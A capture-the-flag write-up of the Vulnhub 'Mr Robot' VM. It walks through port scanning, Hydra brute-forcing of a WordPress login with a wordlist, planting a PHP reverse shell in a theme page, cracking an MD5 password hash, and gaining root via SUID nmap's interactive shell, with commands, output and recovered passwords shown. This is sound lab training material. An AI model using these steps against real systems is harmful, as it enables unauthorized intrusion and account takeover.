Vulnhub - Mr Robot Writeup

5 minute read

Description

Vulnhub - Mr Robot. Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Enumeration

Nmap

Nmap scan report for mrrobot.com (192.168.100.4)
Host is up, received arp-response (0.00089s latency).
Scanned at 2020-05-07 23:32:46 EDT for 19s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT    STATE  SERVICE REASON         VERSION
22/tcp  closed ssh     reset ttl 64
80/tcp  open   http    syn-ack ttl 64 Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/ssl syn-ack ttl 64 Apache httpd (SSL-only mode)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache

We have a couple of open ports. Opening the ip via browser displays some fancy graphics based on the show Mr Robot. I couldn’t find anything useful in the source code.

Nikito

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.4
+ Target Hostname:    mrrobot.com
+ Target Port:        80
+ Start Time:         2020-05-07 23:33:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://mrrobot.com/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-05-07 23:45:41 (GMT-4) (753 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We have few interesting entries here. Looks like the website is running wordpress. Ran wpsscan and found some potentially vulnerable plugins. Spent a ton of time on those, but couldn’t exploit any. Most probably those are rabbit holes.

Robots.txt

HTTP/1.1 200 OK
Date: Fri, 08 May 2020 09:03:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 13 Nov 2015 07:28:21 GMT
ETag: "29-52467010ef8ad"
Accept-Ranges: bytes
Content-Length: 41
Content-Type: text/plain

User-agent: *
fsocity.dic
key-1-of-3.txt

And we can see the first key and a .dic file. Download both and inspect fsocity.dic.

kali@kali:~/Desktop/vulnhub/mrrobot$ file fsocity.dic 
fsocity.dic: , name offset 0x620a7574
kali@kali:~/Desktop/vulnhub/mrrobot$ wc -l fsocity.dic 
858160 fsocity.dic

Looks like this is a file with a whooping 858k values. Thats a lot and I have no idea what to do with it.

Low Shell

Wordpress

While trying out some values in the wordpress login page I noticed something peculiar. It prints out the message ERROR: Invalid username.

image1

We can try brute forcing the username using the list we downloaded to find a valid user. But the list is too damn big. But after going through the list a bit, I found that there are duplicate values. We can sort and get the unique values and see how many do we have.

kali@kali:~/Desktop/vulnhub/mrrobot$ sort fsocity.dic | uniq | tee u_fsocity.dic | wc -l
11451

Now we just have 11k values and its much easier.

Hydra

We can use the custom message to find a valid username. The password we use doesn’t matter as we are just trying to find a valid user.

kali@kali:~/Desktop/vulnhub/mrrobot$ hydra -L newlist -p mypassword mrrobot.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-09 06:40:23
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://mrrobot.com:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username
[STATUS] 1896.00 tries/min, 1896 tries in 00:01h, 9556 to do in 00:06h, 16 active
[STATUS] 1620.67 tries/min, 4862 tries in 00:03h, 6590 to do in 00:05h, 16 active
[80][http-post-form] host: mrrobot.com   login: elliot   password: mypassword
[80][http-post-form] host: mrrobot.com   login: Elliot   password: mypassword
[80][http-post-form] host: mrrobot.com   login: ELLIOT   password: mypassword

We have got a valid user. Now bruteforce the password using this username and the sorted list.

kali@kali:~/Desktop/vulnhub/mrrobot$ hydra -l elliot -P newlist mrrobot.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:The password you entered"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-09 06:46:00
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://mrrobot.com:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:The password you entered
[STATUS] 687.00 tries/min, 687 tries in 00:01h, 10765 to do in 00:16h, 16 active
[STATUS] 737.33 tries/min, 2212 tries in 00:03h, 9240 to do in 00:13h, 16 active
[STATUS] 721.43 tries/min, 5050 tries in 00:07h, 6402 to do in 00:09h, 16 active
[80][http-post-form] host: mrrobot.com   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-09 06:54:02

And we have a valid login.

After logging in, to get a shell do the following.

  1. Go to wordpress editor
  2. Upload our php reverse shell in any page. (I used the 404 error page)
  3. Start a nc listener.
  4. Open the 404 page in browser.

image1

Shell Upgrade

Found some interesting files while looking around.

$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
robot@linux:~$ cat key*
cat key*
822c73956184f694993bede3eb39f959
$ cat passw*
robot:c3fcd3d76192e4007dfb496cca67e13b

Looks like an MD5 hash. Try cracking it using Crackstation.

image1

Change user to robot using these credentials and we can read the second flag.

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Root Shell

Find files with suid permissions.

robot@linux:~$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

We have nmap with suid permissions. Check the version.

robot@linux:~$ nmap --version
nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

Its an older version. We can escalate privilege using nmap --interactive.

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key*
cat key*
04787ddef27c3dee1ee161b21670b4e4

And we have the final key.

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.